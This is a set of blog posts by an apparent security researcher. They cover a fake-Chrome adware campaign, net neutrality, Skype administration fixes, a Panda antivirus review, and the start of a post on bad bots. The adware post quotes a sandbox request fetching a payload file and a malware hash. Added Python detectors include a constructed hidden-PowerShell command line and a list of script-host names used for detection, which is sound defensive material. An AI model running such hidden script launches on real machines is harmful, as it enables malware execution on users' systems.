Adware Empire – IronSource and InstallCore

A recent Adware campaign using malicious Bing ads led me to a Chrome download that eventually deploys Adware on the user’s computer. The IPs and types of Adware connect back to IronSource Ltd, Babylon Software Ltd., and InstallCore, all Israeli companies that have connections to Adware. See here, and here.

(Note: This was reported heavily by ZDNet, OnMSFT, Inquirer and Alphr in recent days. My discovery of the malicious ads is independent of any other source. My list of 3,500 IronSource hostnames is exclusive, as is all of the IP research behind the Adware.)

At this time there appears to be a publisher steering users to a network of sites that deliver a payload of Adware. Please note that I have only made tangential connections between said publisher and the aforementioned companies. Various IP addresses and analysis of the Adware point to IronSource as the controlling entity of the servers that the Adware communicates with after it’s delivered. That’s not to say that IronSource is necessarily aware that a publisher (pay-per-install) is redirecting visitors to sites that impersonate Google Chrome.

The process began by searching for ‘Download Chrome‘. An ad at the top of the page looks like a legitimate Chrome advertisement and has an ‘Ad’ marker clearly visible, but it is poisoned: it leads to a fake Google Chrome domain.

Notice how the ad below says Chrome is a “fast,secure” browser, missing a space.


A fake Chrome website ‘’ is presented to the user when they click the top ad:



Clicking ‘Download Chrome‘ leads the user to a URL:
302 Redirect
Which leads to another URL with the payload: 

^^ The file above on VirusTotal (1/70) is detected only by BitDefender. Here’s the JoeSandBox malware analysis. The malware type delivered is DealAgent, which is considered Adware.

We discovered a number of different Adware families being delivered from the hosts this file communicated with, including Amonetize, BitVote Miner, Babylon Toolbar, InstallCore, Strictor, Dealply, InstallMiez (MacOS), OpenCandy, Optimizer Pro, SProtector, Crepreote, AdvancedMacCleaner, Vittalia, OpinionSpy, Spynion, and Adware going by many other names across all of the IPs involved. There was also a prevalence of MacOS unwanted programs and Adware communicating with these hosts, much like Command & Control infrastructure in malware. (JoeSandBox Malware Analysis)

A video below shows the full sequence of events:

We’ve compiled a video of the event and screenshots to walk through the process of encountering the Adware. In our video, the antivirus BitDefender blocks the attack; it was the only one of 70 engines that detected the file on VirusTotal. See the JoeSandBox full analysis.

Deeper Investigation

***Update #1: Check out this list of 3,500 IronSource hostnames, still active!

***Update #2: A related IP address, 199.58.87.151, sits in a block owned by IronSource. It contains interesting files that appear to be payloads for the Adware applications. Curiously, a few are named ‘KAVcompatibilityCheck.cis‘ and ‘Symantec_Norton_IronSourcev5.cis‘. Here’s a zip of the files I downloaded from the URLs in VirusTotal. Can you analyze these?

Below I will investigate 3 domains. One belongs to the publisher, and the other two appear to funnel traffic, using a referrer ID, to a payload domain with round-robin DNS. Several of the IPs it resolves to belong to IronSource based on WHOIS records. Others are unidentified, but given the identical file structure and activity, I’d say there’s a great chance it’s all connected. As you scroll down you’ll find pieces of evidence. I encourage you to continue researching them and connecting the dots. Let me know what you find…


The landing page is a 116-day-old domain registered by [email protected] at an IP address that reportedly belongs to Vultr Holdings, LLC.

Example of the site ‘’:

A number of other domains are registered to this user with the word ‘Chrome’ or ‘Google’ in them.

Two other domains stand out, like the ‘‘ up top. They don’t seem to fit the profile of the fake Chrome sites. Below are ‘’ and ‘’ from 3-4 years ago.

Information on the registrar:

Blog @ no logins since 2007 –

The Pastebin link has ‘456223’, ‘richard86811’, ‘868118918’ and ‘[email protected]’ in a DB dump of some kind that reveals another e-mail associated with the Gmail used to register these domains. The number 86 is the country code for China, and 86-811-8918 could potentially be a partial phone number.

Names associated w/ domains: Jiaqiang Li (Jiangmen & Guangdong, China) and Chen Weilong (Guangdong, China)

Domain #2:

This domain is the initial redirector after you click Download Chrome. It’s a 20-day-old domain currently protected by Cloudflare. It’s not uncommon to see malicious sites behind Cloudflare. I’ve made dozens of attempts to report abuse to this vendor only to be rebuffed and told that “Our service is a pass-thru and we do not control the content of our customers”.

The VirusTotal results show not only that this domain is rated Malware by Fortinet, PREBYTES, and , but also that other domains on the same IP appear to host backdoor PHP files and other malicious-looking randomized domains. That is unrelated to this campaign, but it goes to show that Cloudflare can both protect the good guys and obfuscate the real location of the bad guys.

Domain #3:

This domain is 101 days old and has been using rotating Amazon IPs since at least 10/08/2018, based on passive DNS. Not surprising, as we see plenty of hacked and/or fraudulent AWS accounts on which attackers control domains with no legitimate front page.

Other files with different packing show various levels of detection by AV engines.

The malware ChromeSetup.exe is detected as InstallCore or as a generic dropper/trojan.

Click for the JoeSandBox analysis of these files and domains, which goes into depth:

Domain #4: (dev, img, remote)

The dropped file ChromeSetup.exe communicates with a couple of subdomains on a 35-day-old domain using AWS DNS. There is a connection between this domain and IPs owned by IronSource at LeaseWeb. Also, many of the IPs it resolves to serve the ‘Babylon Toolbar‘, a piece of software made by Babylon Software Ltd in Israel. Many of the images for the ChromeSetup.exe file are pulled from the domain ‘’, and there’s no shortage of IPs behind it.

We resolved them globally with Whatsmydns to find a round-robin of addresses:

IPs: [ (Active) (Old), (Old) ] (IronSource Israel via LeaseWeb)

Note how IronSource’s IP range has plenty of misleading or downright fake file names. These aren’t files that are ‘communicating’ but ones that have been pulled down from these hosts.

Check out this list of 3,500 IronSource domains; most are still active!

Note that ‘’ is hosted off of this IP owned by IronSource. Below is a discussion between two hackers on a forum about doing Adware installs for them, which links the companies together. InstallCore is an IronSource service.

LeaseWeb identifies the customer in WHOIS records: ‘’ is a domain that ChromeSetup.exe talks to often, as confirmed in the sandbox analysis.

Note that each IP has a VirusTotal link to see its activity:

IP: [,] –  (Amazon AWS)

IP: [] (

IP: [] [] (NForce Entertainment B.V.)

IP: [] – (Leaseweb)

IPs: [,,] (Midphase

IP: [] ( via LeaseWeb)

The ChromeSetup.exe file talks heavily to these hosts and grabs not only images but suspicious files. See the JoeSandBox analysis for all communications.

Oct 26, 2018 6129 OUT HEAD /ofr/Solululadul/osutils.cis HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

(SHA256: 168656b0a807e5fa2c016d637c0c02d83753919ac5a8f493895e9dddce1a916c)
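As an added example (my own code, not part of the original write-up or the sandbox tooling), here is a small Python triage helper for the kind of sandbox HTTP log excerpt shown above. It parses request blocks into structured records, flags fetches of payload-style files (the ‘.cis’ and ‘.exe’ names seen in this campaign), separates HEAD probes from actual downloads, and checks a dropped file’s SHA-256 against a known-bad set. The first request block in the sample is the one quoted above; the second request block and the file bytes are constructed, the payload extension list is my assumption, and the only hash in the IOC table is the one listed above.

```python
"""Triage helpers for a sandbox HTTP request log and dropped-file hashes.

Added example, not from the original post. The first request block in
SAMPLE_LOG is the one quoted in the write-up; the second block is constructed.
"""
import hashlib
import re
from dataclasses import dataclass, field

# One block per outbound HTTP request, in the sandbox's layout:
# "<date> <bytes> <IN|OUT> <METHOD> <path> HTTP/<ver>" followed by header
# lines, with a blank line separating blocks.
SAMPLE_LOG = """\
Oct 26, 2018 6129 OUT HEAD /ofr/Solululadul/osutils.cis HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Oct 26, 2018 6130 OUT GET /img/banner.png HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
"""

REQUEST_LINE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4}) (?P<size>\d+) (?P<direction>IN|OUT) "
    r"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d$"
)

# Assumed payload extensions: '.cis' bundles and ChromeSetup.exe-style
# executables are what this campaign served. Matching is case-insensitive.
PAYLOAD_EXTENSIONS = (".cis", ".exe")

# SHA-256 indicators. The only entry is the hash given in the write-up above.
KNOWN_BAD_SHA256 = {
    "168656b0a807e5fa2c016d637c0c02d83753919ac5a8f493895e9dddce1a916c":
        "sample listed in the write-up (see hash above)",
}


@dataclass
class HttpRequest:
    timestamp: str
    direction: str
    method: str
    path: str
    headers: dict = field(default_factory=dict)

    def is_payload_fetch(self) -> bool:
        """True when the requested path ends in a payload-style extension."""
        return self.path.lower().endswith(PAYLOAD_EXTENSIONS)

    def is_probe(self) -> bool:
        """HEAD requests (as in the quoted excerpt) check for a component
        without downloading it; a later GET is the actual transfer."""
        return self.method == "HEAD"


def parse_requests(log: str) -> list:
    """Split a sandbox HTTP log into HttpRequest records, headers lower-cased."""
    requests, current = [], None
    for raw in log.splitlines():
        line = raw.strip()
        if not line:            # a blank line closes the current block
            current = None
            continue
        m = REQUEST_LINE.match(line)
        if m:
            current = HttpRequest(m["ts"], m["direction"], m["method"], m["path"])
            requests.append(current)
        elif current is not None and ":" in line:
            name, _, value = line.partition(":")
            current.headers[name.strip().lower()] = value.strip()
    return requests


def payload_requests(log: str) -> list:
    """Paths of payload-style fetches, in log order."""
    return [r.path for r in parse_requests(log) if r.is_payload_fetch()]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def match_known_bad(data: bytes, iocs: dict = KNOWN_BAD_SHA256):
    """Return the IOC label for a dropped file's bytes, or None if unknown."""
    return iocs.get(sha256_hex(data))


if __name__ == "__main__":
    for req in parse_requests(SAMPLE_LOG):
        kind = "PAYLOAD" if req.is_payload_fetch() else "other"
        kind += " probe" if req.is_probe() else ""
        print(f"{req.timestamp} {req.method:4} {req.path} [{kind}] "
              f"UA={req.headers.get('user-agent', '?')}")
    # Constructed bytes stand in for a dropped file; a real sample's bytes
    # would be read from disk and compared the same way.
    print(match_known_bad(b"constructed sample bytes") or "no IOC match")
```

Run it against a full sandbox export and the payload list gives you the ‘.cis’ components to pull for hashing; anything that matches the IOC table is the same component seen here, anything that does not is new and worth a VirusTotal lookup.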

Still working on this investigation…. Have any tips? Drop me a line in my contact form.

Net Neutrality – The Spirit Lives On

What if one day your Netflix suddenly stopped streaming and displayed an error message telling you to call your Internet Service Provider for assistance? You place the call, and the provider advises that you’re not currently subscribed to the third-party streaming plan required to access this type of content. Come to find out, the provider is now charging a fee for access to streaming content outside of its network. You’ll have to purchase a package to access Netflix or be forced to use the provider’s own video streaming service, which comes at an additional cost. Net Neutrality rules are protections created in the spirit of a “need to ensure the openness of the Internet, preserving users’ free and nondiscriminatory access to content, applications or services available on the Internet” (Bello & Jung, 2015).

The scenario with Netflix is but a glimpse into the world painted by those who oppose removing the protections. If a provider makes a user pay for specific services like gaming, video streaming, or establishing a remote connection to your office, it’s considered offering a “tiered service,” which differs from the unlimited subscription model of internet service today. Research suggests that repealing Net Neutrality regulations can be bad for consumers, not only because it harms innovation and competition between providers, but also because it allows consumer internet traffic to be analyzed, manipulated to block content, and throttled to decrease transmission speeds. The potential impacts on the consumer are interruptions to streaming, lower-quality video, possibly an inability to access certain types of services without additional subscription fees, and other scenarios that we’ve yet to imagine. Conversely, under the rules ISPs may not be able to experiment with business models or innovate with new services in the market.

At the heart of the Net Neutrality debate is the concern that providers will be able to analyze, manipulate, throttle, or even block access to specific content on the internet. The term open internet comes to mind when thinking about the origins of the internet – an entity born free and not intended to be commercial in origin. The internet has evolved from a platform that was facilitating communication between universities, to the birth of e-commerce websites – and now services like cloud, the blockchain, or online distance learning leverage it to deliver content to every edge of the earth. It’s become a utility for all kinds of devices as well, for example, cars, refrigerators, water bottles, luggage, and even a surfboard. The possibilities are somewhat endless when you view things through the lens of the Open Internet versus the Restricted Internet. Consumers are increasingly adopting lifestyles that revolve around these services, which necessitates a discussion about the legal rights of ISPs to control information.

It’s entirely possible that ISPs will make changes driven by “self-serving, and profit-maximizing goals when enhancing or degrading content carriage” (Frieden, 2018). Imagine that the service you have doesn’t come with the ‘package’ required for internet access to these types of applications. What about employees who telecommute using a VPN connection to the office? Would ISPs be able to charge a premium for this kind of access, knowing that it’s for a commercial purpose? The short answer is yes; they’re able to categorize and sell products in any way they’d like. It’s believed that “The Internet’s openness should be understood as a guiding principle that transcends each of the layers/tiers and extends throughout the digital ecosystem, and that each of the stakeholders of this ecosystem is essential to its development” (CIGI, 2015). Keeping the spirit of the internet as an open place by integrating protections for consumers is essential to the discussion, and to actions by the FCC. Its proponents want to see these core values preserved and more transparency in how providers manage network traffic.

You might be asking yourself, is all of this for nothing? What is the real threat here, and are ISPs planning, or doing, this kind of thing today? After all, if they have never done this before, then Net Neutrality could be a solution in search of a problem. Is there any history, or even potential, for abuse by these providers? The answer is yes. One violation of Net Neutrality occurred when an organization called Public Knowledge complained to the FCC that Comcast, the number-two internet provider, was throttling BitTorrent traffic. Comcast was working with a vendor, Sandvine, a company that sells ‘Active Network Intelligence,’ a service that gives ISPs better visibility into exactly what kind of traffic is on the network. In a statement, the company explained that “Sandvine determined that the use of several Peer-to-Peer protocols was regularly generating disproportionate burdens on the network, primarily on the upstream portion of the network, causing congestion that was affecting other users on the network” (Comcast, 2008). Based on this research, Comcast had reportedly achieved wide-scale deployment of a blocking platform in 2007, until the FCC ruled that “The selective blocking of file-sharing traffic interfered with users’ rights to access the internet and to use applications of their choice.” Although Comcast had a plausible explanation, it still violated the Net Neutrality rules because it interfered with the normal transmission of information. Comcast positioned itself to analyze and interrupt certain types of legitimate communications without any transparency to its users. Notification of these practices had not been sent to its subscribers, effectively restricting any users of the BitTorrent file-sharing method, which was used at one time by NASA to accelerate the distribution of satellite data.
BitTorrent is not an illegitimate protocol, and even if it were, the issue remains that customers were unaware of these activities. Based on this violation, it is entirely possible that ISPs could begin blocking traffic without the transparency provided by these regulations.

A key argument from proponents of repealing the Net Neutrality rules is that the rules negatively impact innovation and competition between providers. The FCC commissioner stated that “…the regulations made things worse by limiting investment in high-speed networks and slowing broadband deployment. Under Title II, broadband network investment dropped more than 5.6% — the first time a decline has happened outside of a recession.” He went on to say that “Removing these outdated and unnecessary regulations will create a strong incentive for companies to pour resources into building better online infrastructure across the country and bringing faster, better, and cheaper Internet access to more Americans.” (FCC, 2018).

The stated intention of the government is that repealing these rules will aid expansion in rural and hard-to-serve areas, as well as raise average speeds throughout the US. They also wanted to allow ISPs to experiment with different business models, such as giving priority to medical applications or self-driving cars. ISPs may experiment with security, home automation, and services like artificial intelligence that can improve the quality of your experience in a meaningful way. There are limitless possibilities for how companies could innovate with these products. Mainly, the concern is that small players in the market and start-ups wouldn’t be able to create unique services to compete with larger companies. In fact, the FCC found that “Title II regulations are bad for competition. They disproportionately burden the small Internet service providers and new entrants that are best positioned to introduce more competition into the broadband marketplace.” (FCC, 2017), and also that “Restoring Internet freedom will lead to greater investment in building and expanding broadband networks in rural and low-income areas as well as additional competition—leading to better, faster, cheaper Internet access for all Americans, including those on the wrong side of the digital divide.” Based on these statements, it would appear that repealing could promote innovation among ISPs.

The Net Neutrality rules came under attack in January 2017, when President Donald Trump designated Ajit Pai, an FCC commissioner who had previously voted against the Title II reclassification of internet service, as the new head of the FCC. Net Neutrality was finally repealed on June 11th, 2018, and is no longer in effect, after three years of internet service having been classified under the protection of Title II telecommunications law.

As of June 20th, 2018, thirty-six states had proposed or passed a resolution, bill, or executive order to preserve Net Neutrality since the new rules were adopted. Six states (Hawaii, Montana, New Jersey, New York, Rhode Island, and Vermont) addressed this change by issuing executive orders requiring companies wishing to contract with the state to confirm that they will meet the 2017 net neutrality requirements. Thirty states proposed legislation reinstating the net neutrality rules or requiring state contractors to abide by them. Ten additional states initiated resolutions supporting Net Neutrality principles (NRRI, 2018).

Today, internet service providers (ISPs) have to disclose the circumstances under which they block or slow traffic, and disclose if and when they offer paid-priority services. The FCC preserved these ‘transparency’ rules, which address the concern many had about the power ISPs could potentially hold over these communications. This development mitigates the risk that providers would engage in activities such as blocking or throttling connections, as Comcast did with BitTorrent, without telling their customers. The current ruling is a win for consumers, who are only seeking a basic set of guidelines or principles to regulate the behavior of providers. It doesn’t have to be called Net Neutrality, but it does have to provide increased transparency while still allowing ISPs to grow and innovate in the markets in which they operate. We can’t let it be used in an anti-competitive, fraudulent, or discriminatory way to harm consumers or take away the right to equal internet access for all who seek it.

California net neutrality bill easily passes Assembly

Internet groups urge U.S. court to reinstate ‘net neutrality’ rules

Net Neutrality Repeal Enables Abuse By Carriers, Groups Tell Court

Ajit Pai killed net neutrality but still wants you to love the FCC

(Note: I’m actively updating this small paper I wrote for a class on Net Neutrality for a novice audience)


Bello, P., & Jung, J. (2015). Net Neutrality: Reflections on the Current Debate. Global Commission on Internet Governance.

CIGI. (2015). Net Neutrality: Reflections on the Current Debate.

FCC. (2018, May 22). Releases Restoring Internet Freedom Order. Retrieved from

FCC. (2017). Myth vs. Fact. Retrieved from

Frieden, R. (2018). Freedom to Discriminate: Assessing the Lawfulness and Utility of Biased Broadband Networks. Vanderbilt Journal of Entertainment & Technology Law, 20(3), 655-708.

NRRI. (2018). Net Neutrality State Actions Tracker. Retrieved from

Skype – Why can’t it all be so simple

Skype now has four versions of its software, purely for your confusion and inconvenience. Most recently, Microsoft was on its way to cancelling Skype v7.0, with a deadline of Sept 1st, until an uproar from internet users not-so-quietly rolled that back. The new version of Skype that Microsoft is pushing now is called v8.0. Users have brought up issues about its design and overall feel. One ‘idea’ on the Skype Voice site reads “Make Skype 8 look EXACTLY like Skype 7 Classic.” In its own forum, Microsoft stated that “Based on customer feedback, we are extending support for Skype 7 (Skype Classic) for some time. Our customers can continue to use Skype Classic until then.”

The Skype Release Notes are not being updated frequently by Microsoft. We’re seeing new versions, and 1 to 2 weeks later there are still no details on what’s changed.

The Skype FAQ and Known Issues page has limited information on the actual issues we’ve seen with the software. It would be nice to have a closed loop, with the Release Notes showing when things are fixed.

Here’s a quick rundown on versions of Skype:

Skype for Business – Used for SMB/Enterprises, typically via Office365, but can be hosted privately on Rackspace, etc.

Skype for Windows 10 v11 – Windows 10 app that runs off of the Microsoft Store. This version is part of a program called Universal Windows Platform, or UWP, which means it works identically across Windows 10 platforms like PC, tablet, phone, and holographic devices. At this time, it’s not clear if it is missing any features when compared to the new Skype Desktop, but it does seem to be a very basic touch-type app in Windows.

Skype Classic v7.0 – An apparent all-time favorite of Windows users, and they don’t want it to go away. It’s the “same old” same Skype and seems to be working perfectly. I’ve run into errors installing it on Windows 10 at times, which were probably due to a major update that MS still hadn’t put in their fixes to make it work.

Skype for Desktop v8.0 – Newest version of Skype that brings Free HD Video, @mentions, group calls with 24 users, and will soon have privacy features like off-the-record audio chats. The biggest value-add here is in those features, which are combined with a modern interface and, of course, the promise of future development.

There’s also: Skype for Web, Skype Meetings, Skype for Mac, Skype For Linux, Skype for Android, and Skype for iOS, if you feel like you don’t have enough Skype in your life.


I’ll make a list of known issues and fixes as I test the software. Please see below for some of the common deployment and usage-type problems I’ve found in Skype, especially on the new v8.0.

  • Skype v8.0 – attempts to launch SkypeSetup.exe out of the user profile when the user has no admin permissions. The user can NOT open Skype; even when they hit No, the program keeps trying to trigger this download. This happens every time Skype releases an update, and it will effectively lock the user out until admin credentials are provided.

Adding these lines to the hosts file seemed to help block this version of Skype from trying to auto-upgrade:

Delete or block the SkypeSetup file:

del "%APPDATA%\Microsoft\Skype For Desktop\SkypeSetup.exe" /f
  • Skype v8.0 – does not remove Skype Classic from a machine when you push it out. In my testing, I was able to remove Skype v7 first and then push Skype v8. It migrated my profile to the new version. If I pushed Skype v8 on top of v7, it would launch both on start-up. Simply removing v7 didn’t fix it – I had to push v8 again after the removal. Here’s my recommendation:
wmic /node:'LOCALHOST' /interactive:off product where "name LIKE 'Skype% 7.%'" call uninstall

Skype- /silent
  • Skype for Business – Installs with the Business version of Office365 and will NOT let you remove it from the computer. Go ahead, try it… use a customized install XML and it won’t honor the request to keep Lync off the machine. Even if it does remove Lync, the app will automatically reinstall during an online repair of Office.

Remove from start-up:

reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ /v Lync /f
  • Skype For Business – A 2nd issue with Skype For Business is easily connecting to regular Skype users. Microsoft requires them to associate with a Microsoft email before this can happen. You can’t find them, and they can’t find you, until that has been done. In my testing, I could not add my personal Skype account to a test instance running Skype for Business without the Microsoft email association.
  • Skype v11 for Windows 10 – This version of Skype can cause confusion and issues with compatibility when it comes to the new features offered by Skype Desktop v8.

Remove it using Powershell:

Set-ExecutionPolicy -Scope LocalMachine Restricted
Get-AppxPackage Microsoft.SkypeApp | Remove-AppxPackage

Panda Antivirus Adaptive Defense 360

We recently tested Panda Antivirus Adaptive Defense as a continuation of a previous review of NGAV products. Does Panda live up to its claims? Is it the future of Antivirus? It has its ups and downs, but overall I think the issues we experienced can be fixed. It’s headed in the right direction, and overall the interface is designed well for a modern protection platform.

Panda’s current version is 7.x and the product is Adaptive Defense 360. From the marketing on the website, you get the feeling that it’s not your average ‘Panda’ but that it’s next-generation, sexy, and ready to eradicate even the most virulent samples.

During the test, I exchanged 178 emails with the vendor over a period of fewer than 90 days. I’ve learned a great deal through direct experience about its stability and effectiveness. It’s been my experience that you’d better test the heck out of these products, not only for detection but for the basic administration features as well. There can be bugs lurking that may not impact you on the security side but can impair your ability to control and manage endpoints. I went ahead and dug in using my basic Dell models and hoped for the best. Keep in mind that the things I don’t ‘like’ are bugs that can be resolved, not necessarily fatal issues. Here’s my evaluation…

*** Update 8/13 – Panda is aware of this blog and actively working to fix any of the issues I found. They’ve allocated folks from Product Management, Engineering and other teams to help improve response.

A few things to note:

1. My blog recommends products on occasion but has nothing for sale
2. Bugs like to come out when I’m around so careful if I sign up for a demo
3. I don’t drink the kool-aid so I look forward to lifting the marketing curtain

Machines Tested:

Dell Latitude E6440, E5470, E5480
Dell XPS 8390 (Desktop)
Dell Inspiron (7000 Series)
Windows 7 and Windows 10

Things we liked: 

  • Support is light speed and much more responsive than BitDefender. We received prompt responses and consistent service from all of the techs. They responded appropriately to our concerns. Many times it was just a matter of reproducing the issues and gathering the right data. Panda can trigger a ‘PSINFO’ tool to gather support data without you having to send any technical information to support. In comparison, I’ve waited days and days for BitDefender support to reply. Even when they do it’s not with any urgency. If you call there is typically no way to speak to anyone live at BitDefender until they call you back. Panda is easy to get on the phone and called me often when I was available before the afternoon time.
  • Panda recently implemented anti-tampering. I’ve been advocating for this across a number of products. In Barkly, I could simply stop any of the AV processes, execute malcode and start them again. Panda protected its services even in the services.msc snap-in.
  • EDR function traced the source of execution back to a file on many virus samples we tested. We’d get an alert within 0-15 minutes that showed which process executed a particular piece of code and where it connected to. Very useful and is focused on the context of that execution. Liked this better than the fancy tree in other EDR products. It’s better to be able to alert on this in an e-mail format without needing to access the console.
  • Deployment tools were adequate in that there were no major issues with installing, uninstalling or deploying the files. Minimal interruption or notices to the machine when pushing it down with a script. Removal from the console happens in under 15 minutes on most machines.
  • Panda’s support is phenomenal despite us having many bugs with it on our particular platform that was available to test. They responded quickly and with haste. During our support they offered access to an early release version of Panda AD360 8.x as a way to get past known issues on v7.

Issues we worked with support on:

  • Crashing/Bluescreens – Panda caused many bug checks on my machines with the driver NNSPRV.SYS, and by many I mean over a dozen on multiple machines. The key for some was that they were running a slightly older version of the Intel PROSet wireless drivers, but I cannot fully confirm that’s the cause. The crashes continued until we were put on an early release of version 8.0 that seemed to alleviate them. At the time, though, this was not a general release. Every dump had references to Panda drivers in it when the crashes occurred, and they happened often.

  • Performance Issues/Hangups – Machine slowdowns on several boxes that include severe delays opening applications. This happened several more times in the last few months with the most recent being on my own machine while I was using it. I captured video of this and called in to offer an impacted machine to Panda. They were unavailable to gather any data and did not recommend any steps to take on the machine at that time. I had to remove the product and could not wait until ‘tomorrow’ to find out what I needed to do. That issue is still not identified or resolved. The burden was on me to prove that this is an issue even though I’ve captured live video of it happening multiple times. Panda was using 10,000 handles on PSANHOST.EXE when the issue occurs. Chrome tabs were completely hung up and simple applications like Notepad.exe took more than a minute to open. The issue was immediately resolved by removing the AV – which by the way was so hung up it took about 30 minutes. After the removal, we could immediately surf the web, and open up applications.
  • Service instability – Panda services were crashing randomly on versions 7.x-8.x. We detected this in the monitoring of its services, and the issue impacts the latest version. Support requested that we manually gather data using a dump tool for them to assess the issue. The main service controlling Panda crashes and logs ‘The Panda Endpoint Administration Agent service terminated unexpectedly’ on these machines. There is no fix or explanation for this issue, and it’s separate from the ones shown above. We don’t know why the service keeps crashing or what to do next. Even if we did, we believe that this ‘broken agent’ issue leads to decreased security for those endpoints when they aren’t able to update or communicate properly. A lot of time is being spent manually reinstalling agents to fix this issue.
  • Upgrade Issues – Panda also failed to upgrade from v7 to v8 automatically on around 25% of the computers creating a situation where it was ‘broken’ and not functional. There was, of course, a fix or method for support to help us but it was manual, involved remoting into each machine and again the upgrade just didn’t work without any explanation. Many of the computers have rebooted numerous times and get repeatedly prompted to ‘Upgrade Panda’ when they’ve accepted that menu over and over. Meanwhile, the agents did not have full protection because the install was technically broken between versions.

 (Panda Support)

  • Dropper Detection / Kill Chain Issues – None of the files I opened with malicious Word macros were detected until the actual payload ran. Panda did not detect many files on-access, but only once they ran, further down the attack chain. It will stop the PowerShell command from running, but only at the point of execution. A little too close for comfort, especially when many other tools see the evil in the macros and malware code embedded in the document. Out of a dozen or so files I got live from the internet, none of the droppers triggered an alert until they tried something fishy. Panda was quick about adding them as a generic type of alert when I sent in samples. There is no automated system or method to submit samples to Panda without manually opening an e-mail ticket. Panda’s ‘EDR’ type execution report fails to correlate the malicious .doc I opened and only ‘sees’ the PowerShell. But what ran the command? What were the parameters?

 (Panda Support)

  • False Positives – We found that Panda would trigger on innocuous Windows 10 processes, like those that update the Windows Store applications. In some cases it labeled them as ‘potentially malicious’ and, in lock mode, it halted execution until it could determine whether they were truly malicious. This wasn’t the only ‘system’ type file, and we encountered many more with Nvidia and a driver from Intel.
  • Web Filtering / Phishing – Many of the malware and phishing URLs I attempted to visit weren’t classified by the software. During my investigation of the ‘Master Angler’ story this month I had Panda running, and it never blocked any of the URLs. I submitted a URL to Panda with my blog and they added that single address but no others that were obviously running off that same IP. After reporting many of these URLs to Panda, I realized that the phishing protection was outsourced to Cyren and not using its own threat intelligence.
  • Buggy Alerting – Malware alerts were configured for the web and were sent directly from the IP via SMTP to my e-mail server, which was kind of strange. Not only that, but there were still variables in the e-mail that were unresolved, like {ExtendedUrlMalwareinfo}. The other issue was that I’d get tons of duplicates with the same information, maybe 5-10 e-mails in a blast from a single machine visiting a site. It says ‘Virus deleted’ but I couldn’t find anything malicious on some of these sites.

  • Console Outages – The web console had issues on several occasions with server-side errors that prevented me from logging in. At this exact moment I keep logging in, but it tells me that for security reasons my session has timed out.

  • Cookie Alarm – Panda sent alerts for cookies detected on machines and I couldn’t turn it off. There was no way to whitelist or otherwise exclude this extra noise.
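The kill-chain bullet above asks what launched the PowerShell command and with which parameters. As an added example that is not part of the original review, the following walks the parent chain of a script-host launch through constructed process-creation events, so an alert on the PowerShell command also names the Office document that spawned it; the event layout, paths and file names are assumptions.

```python
"""Added example (not part of the original review): correlate a script-host
launch back to the Office document that spawned it by walking parent PIDs
through constructed process-creation events."""
import re

# Constructed Sysmon-style process-creation events (pid, parent pid, image,
# command line). All paths and file names are placeholders.
EVENTS = [
    {"pid": 1204, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 4120, "ppid": 1204,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\bob\Downloads\invoice.doc"'},
    {"pid": 4388, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c powershell.exe -NoProfile -WindowStyle Hidden -File C:\Users\bob\AppData\Local\Temp\update.ps1"},
    {"pid": 4401, "ppid": 4388,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\Users\bob\AppData\Local\Temp\update.ps1"},
    # A benign administrative launch straight from Explorer, for contrast.
    {"pid": 5010, "ppid": 1204,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Path of an Office document passed on the Office application's command line.
DOC_RE = re.compile(r'([A-Za-z]:\\[^"]*?\.(?:docm?|dotm?|rtf|xlsm?))', re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Return the event chain from the oldest known ancestor down to pid.

    Stops when the parent is unknown or a cycle is detected (PID reuse)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def office_spawned_script_hosts(events):
    """Flag script hosts that descend from an Office application and report
    the document the Office process was opened with."""
    findings = []
    for e in events:
        if basename(e["image"]) not in SCRIPT_HOSTS:
            continue
        chain = ancestry(events, e["pid"])
        office = [a for a in chain if basename(a["image"]) in OFFICE_APPS]
        if not office:
            continue  # e.g. an admin running PowerShell from Explorer
        m = DOC_RE.search(office[0]["cmdline"])
        findings.append({
            "pid": e["pid"],
            "command_line": e["cmdline"],
            "office_parent": basename(office[0]["image"]),
            "document": m.group(1) if m else None,
            "chain": [basename(a["image"]) for a in chain],
        })
    return findings


if __name__ == "__main__":
    for f in office_spawned_script_hosts(EVENTS):
        print(" -> ".join(f["chain"]))
        print("document:", f["document"])
        print("command :", f["command_line"])
```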



Bad Bots – Headless Chrome

There’s never a shortage of bad bots and unidentifiable applications that crawl websites. Are they scraping the content? Updating it for some unnamed organization’s news site? Storing an archive of it? It’s not clear, as they typically won’t identify themselves with a legitimate robot-type user agent.

